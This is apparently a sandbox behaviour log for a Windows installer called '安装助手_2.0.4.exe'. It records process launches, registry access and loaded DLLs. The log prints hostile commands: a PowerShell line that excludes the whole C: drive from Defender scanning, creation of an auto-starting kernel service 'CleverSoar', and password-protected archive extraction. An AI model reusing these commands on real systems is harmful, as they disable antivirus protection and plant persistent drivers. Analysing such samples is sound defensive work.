Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeVirustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: edputil.dllJump to behavior
